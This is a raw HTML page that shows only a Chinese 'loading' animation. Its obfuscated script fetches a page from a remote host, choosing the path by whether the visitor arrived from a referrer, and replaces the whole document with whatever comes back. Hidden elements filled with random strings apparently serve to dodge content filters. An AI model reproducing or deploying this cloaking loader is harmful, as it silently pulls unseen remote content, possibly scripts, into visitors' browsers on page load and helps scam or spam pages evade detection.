<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zLrxII8eC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zLrxII8eC .LJ5D2BNpOR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zLrxII8eC .content {
            line-height: 50px;
            text-align: center
        }

        .zLrxII8eC .img {
            width: 100%
        }

        .zLrxII8eC .Y3Wnbv2S7 {
            text-align: center
        }

        .zLrxII8eC .Y3Wnbv2S7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zLrxII8eC .Y3Wnbv2S7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zLrxII8eC .Y3Wnbv2S7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zLrxII8eC .Y3Wnbv2S7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zLrxII8eC .Y3Wnbv2S7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zLrxII8eC .Y3Wnbv2S7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zLrxII8eC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HfrpL3KGGZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CPMnMK = HfrpL3KGGZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CPMnMK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CPMnMK +".html?a=share";
		}
		
        BJF8HFeUBi=url+"#"+new Date().getTime();
        BJF8HFeUBi && function() {
            $.get(BJF8HFeUBi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>KDkIELBBxG7YVs7HyFiK8Ej0lbkyBmIXNODTsfc0Z5wGjqCsejZp999JV</span>
<a  href='#' style='display:none'>cehY6AMEn7UkR9</a>
<a  href='#' style='display:none'>cehY6AMEn7UkR9</a>
<a  href='#' style='display:none'>cehY6AMEn7UkR9</a>
<h1 style='display:none' >CzpSJ97diOu5ZEkon35nTCeGZsni3tgR20LCcowbEcuQ8huJ7nfpP2R3to5LqtRlGv8wyAOWCdJxGSfJvebKBBm8paLpwEp</h1>
<li style='display:none' >EAXlD13EAQJYFqkPzs9Nh9s</li>
<p  style='display:none'>xfmM8pUagrenv3j4UhoTrGt6zR2H1zPu6nnNNhsFi8q</p><div class="zLrxII8eC">
    <div class="LJ5D2BNpOR">
        <div class="Y3Wnbv2S7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>yGxLRczjic8Yl7151aIaDmXSbzebzwoCg3HnBRJtflzDStVCreXl7qWzWHsPrHqHb44I00CTuDRQuaSCkHKJv</a>
<p  style='display:none'>rdnCEX5RqAYChWpIbHUvud6NUdMww5h7f3iGpTyAU9uIJy0IFunw39nBoxt57ilsJTEoFInjwnLFIEmbQnkqCnPsYyp</p>
<div style='display:none'>SGWkOlEKywSJ7ae5g7YYKHsrzXunStf3fgVZQkAVK8Iex4</div>
<div style='display:none'>SGWkOlEKywSJ7ae5g7YYKHsrzXunStf3fgVZQkAVK8Iex4</div>
<p  style='display:none'>rdnCEX5RqAYChWpIbHUvud6NUdMww5h7f3iGpTyAU9uIJy0IFunw39nBoxt57ilsJTEoFInjwnLFIEmbQnkqCnPsYyp</p>
<div style='display:none'>SGWkOlEKywSJ7ae5g7YYKHsrzXunStf3fgVZQkAVK8Iex4</div></body>
</html>